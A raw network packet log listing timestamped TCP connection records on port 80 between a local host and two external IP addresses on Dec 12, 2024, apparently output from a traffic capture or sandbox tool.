                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.030061960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.030069113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.030090094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.030117035 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.031102896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.031296015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.031667948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.032025099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.032885075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.033062935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.033127069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.033307076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.034096956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.034188986 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.034774065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.034903049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.035083055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.035922050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.036205053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.036262989 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.037163973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.037184000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.037215948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.037220955 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.037298918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.038137913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.038237095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.038410902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.039098978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.087841034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.137590885 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.137644053 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.137790918 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.141351938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.141418934 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.141722918 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.149228096 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.149296045 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.149635077 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.156395912 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.156582117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.156688929 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.164160967 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.164190054 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.164629936 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.169606924 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.170506954 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.171458006 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.174031973 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.175697088 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.175954103 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.176239967 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.178293943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.178421021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.178858995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.178910017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.178994894 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.179018021 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.179024935 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.179028034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.179335117 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.179946899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.180058002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.180247068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.180813074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.181904078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.181910992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.181945086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.182041883 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.182867050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.183039904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.183677912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.183785915 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.183794022 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.183832884 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.183906078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.184130907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.184176922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.184876919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.185597897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.185899973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.186110020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.186177969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.186197042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.186927080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.187024117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.187154055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.187948942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.188577890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.188585997 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.188591957 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.188694954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.188709021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.188986063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.189285994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.189996004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.190803051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.190992117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.191045046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.191050053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.191189051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.192013979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.192157984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.193044901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.193223953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.193350077 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.193372011 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.193420887 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.193425894 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.193463087 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.194032907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.195082903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.195198059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.195209026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.195255041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.196104050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.196201086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.196619987 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.197221041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.197304010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.198280096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.198355913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.198394060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.198513985 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.198519945 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.198570013 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.198575974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.199172974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.200001001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.200074911 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.200196028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.200202942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.200262070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.201212883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.201221943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.201322079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.202136993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203069925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203078985 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203109026 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203188896 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203206062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203214884 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203214884 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203228951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.203272104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.204221010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.204547882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.204772949 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.205193996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.205251932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.205430984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.206270933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.207247972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.207256079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.207262993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.207334042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.207976103 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.208081961 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.208264112 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.208301067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.208389044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.208410025 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.208437920 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.209249973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.209364891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.209414959 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.210335016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.210345030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.210477114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.211426973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.211436033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.211487055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.212343931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.212538004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.212635040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.212733030 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.212905884 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.213397980 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.213406086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.213496923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.213557005 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.213594913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.214622021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.215120077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.215348005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.215929985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.216278076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.216324091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.216825962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.216851950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.216888905 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.217621088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.217737913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.217791080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.217865944 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.217873096 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.217997074 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.218570948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.219074965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.219264030 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.219449043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.220058918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.220138073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.220448017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.220453978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.220621109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.221530914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.221908092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.221995115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.222549915 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.222605944 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.222614050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.222655058 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.222696066 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.222748995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.222831011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.223450899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.223915100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.223988056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.224514008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.224519968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.224602938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.225596905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.225603104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.225684881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.226524115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.226856947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.226927042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.227394104 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.227399111 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.227528095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.227529049 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.227665901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.227739096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.228569031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.228838921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.228919983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.229545116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.230056047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.230149984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.230552912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.231345892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.231404066 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.231555939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.232125998 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.232270002 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.232287884 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.232316971 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.237062931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.237185955 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.238957882 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.239342928 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.241869926 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.241988897 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.275341034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.329834938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.329862118 CET8049957185.215.113.16192.168.2.10
